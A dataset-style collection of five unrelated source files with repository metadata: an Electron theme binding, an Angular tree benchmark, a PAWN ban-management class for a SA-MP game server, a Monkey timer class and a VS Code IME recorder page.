const { nativeTheme } = process._linkedBinding('electron_common_native_theme'); module.exports = nativeTheme;
TypeScript
1
lingxiao-Zhu/electron
lib/browser/api/native-theme.ts
[ "MIT" ]
/** * @license * Copyright Google LLC All Rights Reserved. * * Use of this source code is governed by an MIT-style license that can be * found in the LICENSE file at https://angular.io/license */ import {TreeNode} from '../util'; // We load "IncrementalDOM" as a AMD global because the "incremental-dom" NPM package does not // come with a named UMD module, and it's easier to just import the AMD file and use it globally. declare const IncrementalDOM: any; const {patch, elementOpen, elementClose, elementOpenStart, elementOpenEnd, text, attr} = IncrementalDOM; export class TreeComponent { constructor(private _rootEl: any) {} set data(data: TreeNode) { patch(this._rootEl, () => this._render(data)); } private _render(data: TreeNode) { elementOpenStart('span', '', null); if (data.depth % 2 === 0) { attr('style', 'background-color: grey'); } elementOpenEnd(); text(` ${data.value} `); elementClose('span'); if (data.left) { elementOpen('tree', '', null); this._render(data.left); elementClose('tree'); } if (data.right) { elementOpen('tree', '', null); this._render(data.right); elementClose('tree'); } } }
TypeScript
5
raghavendramohan/angular
modules/benchmarks/src/tree/incremental_dom/tree.ts
[ "MIT" ]
// Copyright 2006-2015 Las Venturas Playground. All rights reserved. // Use of this source code is governed by the GPLv2 license, a copy of which can // be found in the LICENSE file. /** * A callback used by the Ban Manager to receive information about whether a player is currently * banned. If this gets invoked by the MySQL plugin and has rows, then we know there's something fishy. * * @param resultId Id of the database result set containing the ban's information. * @param playerId Id of the player who we fired this request for. */ forward OnBanVerificationCompleted(resultId, playerId); public OnBanVerificationCompleted(resultId, playerId) { BanManager->onVerificationComplete(playerId, resultId); DatabaseResult(resultId)->free(); } /** * Kicks the player from the server after a delay set by the caller. This is necessary because of * another one of SA-MP's silly "security" features, which may mean that we end up not showing some * messages to the users. */ forward DelayedKick(playerId); public DelayedKick(playerId) { Player(playerId)->onDisconnect(); // block all their input. Kick(playerId); // valid Kick() usage. } /** * In javascript we expose the method to generate the Murmur3Hash to here so we do not need to use * the slow database-function for it. */ native MurmurIIIHashGenerateHash(key[], len, hash[]); /** * Formats the range ban described by the given |rangeStart| and |rangeEnd| into the |buffer|. */ formatRange(rangeStart[], rangeEnd[], buffer[], bufferSize = sizeof(buffer)) { new index = 0; new dots = 0; while (index < bufferSize && rangeStart[index] == rangeEnd[index]) { if (rangeStart[index] == '.') ++dots; buffer[index] = rangeStart[index]; index++; } buffer[index] = 0; switch (dots) { case 0: format(buffer, bufferSize, "*.*.*.*"); case 1: strcat(buffer, "*.*.*", bufferSize); case 2: strcat(buffer, "*.*", bufferSize); case 3: strcat(buffer, "*", bufferSize); } } /** * Administrators have the ability to disallow a player to play on Las Venturas Playground for a * certain amount of time, which is known as being banned from the server. The Ban Manager will * verify whether a player is allowed to play on the server when they join it. Furthermore, it also * is the interface for adding log messages to a user's persistent profile data. * * @author Russell Krupke <russell@sa-mp.nl> */ class BanManager { // If an administrator does not specify how long a ban should last for, what is the default // duration we should apply to the ban? Specify this in number of days. public const DefaultBanDuration = 3; // The query we use to verify whether a player can play on LVP. new m_verifyQuery; // Query for increasing the tally of a range ban exception. new m_incrementTallyQuery; // The query used for creating a new entry in the logs table. new m_createEntryQuery; // Maintain a boolean indicating whether the player was kicked by an undercover administrator. new bool: m_undercoverKicked[MAX_PLAYERS]; /** * Create prepared statements for the queries which will be used for the Ban Manager when the * gamemode starts up. This saves us from doing the processing later on. Note that we don't * consider the nickname as a means of identifying a banned player at this time. */ public __construct() { // Date format [%W, %M %D] = Thursday, August 8th // Date format [%W, %M %D at %h:%i %p] = Thursday, August 8th, at 01:25 AM m_verifyQuery = Database->prepare("SELECT " ... " DATE_FORMAT(log_date, '%W, %M %D') AS ban_start_date, " ... " DATE_FORMAT(ban_expiration_date, '%W, %M %D at %h:%i %p GMT') AS ban_end_date, " ... " IF(ban_expiration_date = '0000-00-00 00:00:00', 0, 1) AS ban_has_end_date, " ... " IFNULL(range_exceptions.exception_author, '') AS exception_author, INET_NTOA(ban_ip_range_start) AS range_start, " ... " INET_NTOA(ban_ip_range_end) as range_end, range_exceptions.exception_id, user_nickname, description " ... "FROM " ... " logs " ... "LEFT JOIN " ... " range_exceptions ON (range_exceptions.ip_range_begin = logs.ban_ip_range_start AND " ... " range_exceptions.ip_range_end = logs.ban_ip_range_end AND " ... " range_exceptions.nickname = ?) " ... "WHERE " ... " (log_type = 'ban' OR log_type = 'banip') AND " ... " ban_expiration_date > NOW() AND " ... " ((subject_user_id <> 0 AND subject_user_id = ?) OR " ... " (ban_ip_range_start <= INET_ATON(?) AND ban_ip_range_end >= INET_ATON(?)) OR " ... " gpci_hash = ?) " ... "ORDER BY " ... " log_date DESC " ... "LIMIT " ... " 1", "sisss"); // The query for incrementing the usage count tally for a range exception. m_incrementTallyQuery = Database->prepare("UPDATE " ... " range_exceptions " ... "SET " ... " exception_tally = exception_tally + 1 " ... "WHERE " ... " exception_id = ?", "i"); // The query used for creating a new entry in the logs table. m_createEntryQuery = Database->prepare("INSERT INTO " ... " logs " ... " (log_date, log_type, ban_ip_range_start, ban_ip_range_end, ban_expiration_date, user_nickname, user_id, subject_nickname, subject_user_id, description) " ... "VALUES " ... " (NOW(), ?, INET_ATON(?), INET_ATON(?), FROM_UNIXTIME(?), ?, ?, ?, ?, ?)", "sssisisis"); } /** * Marks the player as not having been automatically banned when they connect to the server. If * we don't do this, then their leaving won't be announced properly. * * @param playerId Id of the player who has left Las Venturas Playground. */ @list(OnPlayerConnect) public onPlayerConnect(playerId) { m_undercoverKicked[playerId] = false; } /** * Verify whether the player is allowed to play on Las Venturas Playground after their account * information is available. This is necessary because we also have the ability to ban players * based on their user Id. This method won't be called for non-player characters. * * @param playerId Id of the player to verify for whether they are allowed to play. * @param userId Id of the player's user account, or 0 if they're unregistered. */ public verifyPlayerAllowedToPlay(playerId, userId) { new ipAddress[16]; format(ipAddress, sizeof(ipAddress), Player(playerId)->ipAddressString()); new playerGpci[128] ,hashedPlayerGpci[15]; gpci(playerId, playerGpci, sizeof(playerGpci)); MurmurIIIHashGenerateHash(playerGpci, 0, hashedPlayerGpci); Database->execute(m_verifyQuery, "OnBanVerificationCompleted", playerId, /** ? **/ Player(playerId)->nicknameString(), userId, ipAddress, ipAddress, hashedPlayerGpci); } /** * This method will be fired when we received information about whether a player has an active, * meaning they are not permitted to play on Las Venturas Playground at this time. Tell them, * and make sure we remove them from the server in due time. If the result set has no rows at * all, then the player is *not* banned from the server. * * @param playerId Id of the player who we fired this request for. * @param resultId Id of the database result set containing the ban's information. */ public onVerificationComplete(playerId, resultId) { if (Player(playerId)->isConnected() == false) return; // the player doesn't seem to be connected anymore. if (DatabaseResult(resultId)->count() != 1 || !DatabaseResult(resultId)->next()) { Announcements->announcePlayerConnected(playerId); return; // we couldn't fetch useful information from the database. } new rangeStart[16], rangeEnd[16]; DatabaseResult(resultId)->readString("range_start", rangeStart); DatabaseResult(resultId)->readString("range_end", rangeEnd); new const rangeStartLength = strlen(rangeStart); new const rangeEndLength = strlen(rangeEnd); new message[256]; // If this is a range ban, we certainly want to inform folks in #LVP.Crew, but might also // want to ignore the ban if the |playerId| is on the range exception list. if (rangeStartLength >= 7 && (rangeStartLength != rangeEndLength || strcmp(rangeStart, rangeEnd, false, rangeEndLength) != 0)) { new exceptionAuthor[32]; DatabaseResult(resultId)->readString("exception_author", exceptionAuthor); new range[16]; formatRange(rangeStart, rangeEnd, range, sizeof(range)); if (strlen(exceptionAuthor)) { format(message, sizeof(message), "%s (Id:%d) joined with the IP address %s, which is part of the banned range %s. %s added them to the exception list.", Player(playerId)->nicknameString(), playerId, Player(playerId)->ipAddressString(), range, exceptionAuthor); EchoMessage("notice-crew", "z", message); // Increment the tally of the range ban, to keep track of how useful it is. Database->execute(m_incrementTallyQuery, "", 0, DatabaseResult(resultId)->readInteger("exception_id")); return; } else { format(message, sizeof(message), "%s (Id:%d) joined with the IP address %s, which is part of the banned range %s. No exceptions where found.", Player(playerId)->nicknameString(), playerId, Player(playerId)->ipAddressString(), range); EchoMessage("notice-crew", "z", message); } } // Otherwise we're certain that the |playerId| has been banned. Let 'em know. new administratorNickname[24], buffer[64]; DatabaseResult(resultId)->readString("user_nickname", administratorNickname); if (strlen(administratorNickname) == 0) format(administratorNickname, sizeof(administratorNickname), "an administrator"); SendClientMessage(playerId, Color::Error, "You are currently banned on Las Venturas Playground."); DatabaseResult(resultId)->readString("ban_start_date", buffer); format(message, sizeof(message), "You were banned by {33CCFF}%s{FFFFFF} on {33CCFF}%s{FFFFFF}. The reason", administratorNickname, buffer); SendClientMessage(playerId, Color::Information, message); DatabaseResult(resultId)->readString("description", buffer); format(message, sizeof(message), "as was given by the administrator is: {33CCFF}%s", buffer); SendClientMessage(playerId, Color::Information, message); new bool: automaticallyExpires = DatabaseResult(resultId)->readInteger("ban_has_end_date") == 1; if (automaticallyExpires == true) { // We have a date at which the ban will automatically expire, so inform the player of // this date. It's been appropriately formatted already as part of the MySQL query. DatabaseResult(resultId)->readString("ban_end_date", buffer); format(message, sizeof(message), "Your ban is set to expire on {33CCFF}%s{FFFFFF}.", buffer); SendClientMessage(playerId, Color::Information, message); } SendClientMessage(playerId, Color::Information, ""); // spacing. SendClientMessage(playerId, Color::Information, "You may appeal this ban on our forums (http://forum.sa-mp.nl) or on our IRC channel,"); SendClientMessage(playerId, Color::Information, "available at https://sa-mp.nl/chat, or through Discord at https://sa-mp.nl/discord."); // The Player class has the functionality required to actually kick this player. Player(playerId)->scheduleKick(AutoBannedKickReason, ""); } /** * Creates a new entry in the database's "logs" table with the details as specified. This method * is not meant to be called directly from other systems -- they should be using the recordBan, * recordKick and recordLog methods instead. * * @param type The type of log to record, should be one of {ban, kick, log}. * @param administratorId Id of the administrator who's creating this database entry. * @param playerId Id of the player who this database entry is about. * @param description Description of the entry, why is it being created? * @param banIpAddress IP address in case this entry is a ban (optional). * @param banExpirationTime UNIX timestamp at which the ban should expire (optional). */ private createDatabaseEntry(type[], administratorId, playerId, description[], banIpAddress[] = "0", banExpirationTime = 0) { new administratorNickname[24] = "LVP", administratorUserId; if (administratorId != Player::InvalidId && Player(administratorId)->isConnected() == true) { if (UndercoverAdministrator(administratorId)->isUndercoverAdministrator() == false) { GetPlayerName(administratorId, administratorNickname, sizeof(administratorNickname)); administratorUserId = Account(administratorId)->userId(); } else { UndercoverAdministrator(administratorId)->getOriginalUsername(administratorNickname, sizeof(administratorNickname)); administratorUserId = UndercoverAdministrator(administratorId)->getOriginalUserId(); } } new playerNickname[24], playerUserId; if (playerId == Player::InvalidId || Player(playerId)->isConnected() == false) return; // logs must be tied to a player. GetPlayerName(playerId, playerNickname, sizeof(playerNickname)); playerUserId = Account(playerId)->userId(); if (banExpirationTime == 0) banExpirationTime = Time->currentTime(); // m_createEntryQuery parameters: log_type (s), ban_ip_range_start (s), ban_ip_range_end (s), // ban_expiration_date (s), user_nickname (s), user_id (i), subject_nickname (s), subject_id (i), description (s) Database->execute(m_createEntryQuery, "", -1, type, banIpAddress, banIpAddress, banExpirationTime, \ administratorNickname, administratorUserId, playerNickname, playerUserId, description); } /** * Records a kick entry in the database for the given player. Kicks may be automated by features * so the administratorId field may be set to Player::InvalidId, but the playerId id required. * * @param playerId Id of the player who to record a kick for. * @param administratorId Id of the administrator, if any, who initiated the kick. * @param reason The reason for which the player is being kicked. */ public recordKickEntry(playerId, administratorId, reason[]) { new banIpAddress[16]; format(banIpAddress, sizeof(banIpAddress), Player(playerId)->ipAddressString()); this->createDatabaseEntry("kick", administratorId, playerId, reason, banIpAddress); } /** * Records a ban entry for the given player. The player argument is the one being banned, the * administratorId argument the admin who banned them (or Player::InvalidId in case the ban was * automated) and the reason a description of *why* they are being banned. The duration parameter * is optional, but can be used to have this ban automatically expire. * * @param playerId Id of the player who has been banned from Las Venturas Playground. * @param administratorId Id of the administrator, if any, who banned the player. * @param reason The reason as to why the player is being banned. * @param duration The duration of the ban in number of seconds. */ public recordBanEntry(playerId, administratorId, reason[], duration) { if (administratorId != Player::InvalidId && Player(playerId)->isConnected() == false) return; // the player in question isn't connected to the server. new banIpAddress[16], expirationTime = Time->currentTime() + duration; format(banIpAddress, sizeof(banIpAddress), Player(playerId)->ipAddressString()); this->createDatabaseEntry("ban", administratorId, playerId, reason, banIpAddress, expirationTime); } public setUndercoverKicked(playerId, bool: undercover) { m_undercoverKicked[playerId] = undercover; } public bool: wasUndercoverKicked(playerId) { return m_undercoverKicked[playerId]; } };
PAWN
5
EPIC-striker/playground
pawn/Features/Account/Bans/BanManager.pwn
[ "MIT" ]
Import rockout Class Timer Global NewGame:Timer Global ShotReload:Timer Field ticks:Int Method New () Self.ticks = Millisecs () End Method TimeOut (timeout:Int) If Millisecs () > ticks + timeout Return True End End Method Reset () ticks = Millisecs () End End
Monkey
3
blitz-research/monkey
bananas/hitoro/rockout/imports/timer.monkey
[ "Zlib" ]
<!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <style> </style> </head> <body> <button id="startRecording" type="button">Start Recording</button> <button id="endRecording" type="button">End Recording</button> <script src="../../../../loader.js"></script> <script> require.config({ baseUrl: '../../../../../../out' }); require(['vs/editor/test/browser/controller/imeRecorder'], function() { }); </script> </body> </html>
HTML
2
sbj42/vscode
src/vs/editor/test/browser/controller/imeRecorder.html
[ "MIT" ]